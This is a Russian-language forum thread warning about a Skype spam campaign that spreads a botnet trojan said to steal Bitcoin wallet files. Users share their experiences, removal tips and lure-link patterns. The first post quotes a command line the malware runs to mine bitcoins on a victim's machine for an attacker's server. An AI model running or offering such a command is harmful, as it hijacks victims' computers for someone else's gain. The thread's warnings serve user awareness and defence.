[ArhStrAngeR]

В блоге Дмитрия Бестужева, эксперта «Лаборатории Касперского», несколько дней назад появилось сообщение о массированной компании по распространению в skype нового трояна. Пользователям рассылаются сообщения, предлагающие перейти по некой ссылке вида:

www.goo.gl/XXXXX?image=IMG0540250-JPG

По состоянию на 4 апреля интенсивность перехода по ней составляла почти 3 клика в секунду, а общее число кликов — около 170к!
Большая часть жертв — из России и Украины:



Так же затронуты пользователи из Китая, Италии, Болгарии и Тайваня.
Сам троян написан на Visual Basic и так же способен распространяться через USB-накопители. После инфицирования, компьютер жертвы становится частью ботнета, используя для связи с командным сервером IRC протокол.
Кроме того, троян, похоже, ворует файл wallet.dat от Bitcoin кошелька:



В своём следующем посте, Дмитрий рассказал про аналогичную компанию, но распространяющую троян немного другого рода. Оказавшись на машине пользователя, он запускает команду:

bitcoin-miner.exe -a 60 -l no -o http://suppp.cantvenlinea.biz:1942/ -u XXXXXX0000001@gmail.com -p XXXXXXXX

Таким образом, заставляя ваш компьютер добывать биткоины для злоумышленника!
При этом, нагрузка на CPU значительно возрастает:



Пруф

[AlexLeo]

4 дня назад от одного знакомого пришло такое сообщение, типа куча картинок на передачу... Начал качать, ладно Avast начал ругаться - сразу понял что вирус.

[Daddy Cary]

Поймал этот вирус от своих форумчан, так как мне часто кидают скрины кейсов или статистики, но потом пришлось его полностью удалить. Антивирус тут не поможет поможет, а для тех кто хочет избавиться вот FAQ

http://www.youtube.com/watch?v=g26upLDKw98

п.с
Видео снял школьник, но действительно все что он описал убило вирус. Я человек далекий от техники поэтому руководствовался этим видео.

[Cyberflow]

Так же столкнулся с данным трояном - Пруф
Благо аваст предупредил.

[WebPrib]

Cyberflow, Так же столкнулся с данным трояном - Пруф

Надеюсь это ссылка не на страницу с трояном, а на его описание? Аваста у меня нету, заходить безопасно туда можно?

[Cyberflow]

Надеюсь это ссылка не на страницу с трояном, а на его описание? Аваста у меня нету, заходить безопасно туда можно?

Нет, эта ссылка на скриншот сообщения в скайпе.

[kostya.ast]

Недавно были сообщения в скайпе такие, но я как обычно забил на них

[Unlor]

Видео снял школьник,

Да уж, совсем школьник)
Я эту штуку убирал простым cureit, причем полностью и без всяких доп. чисток, только в скайпе контроль доступа чистил руками - ну и судя по тому, что сообщения больше не приходили - помогло.

[temass]

вроде ничего не приходило, но я уже готов к встрече)))

[DESTER]

Сегодня наткнулся на такую фигню в скайпе: "это мой любимый рис из вас _http://fur.ly/9hnp?foto=<Ваш ник в скайпе>". При переходе грузится архив, в архиве файлик, при запуске которого сам инсталлится плагин к скайпу (без запроса... точнее запрос сам одобряется), далее идет спам подобных ссылок по контакт-листу.
CureIt не обнаруживает в качестве вируса. Лечение простое: удаляем из процессов, удаляем сам файл, реинсталлим скайп (в таком порядке).
Замеченные домены: fur.ly bit.ly url9.de ow.ly moourl.com

Будьте осторожны!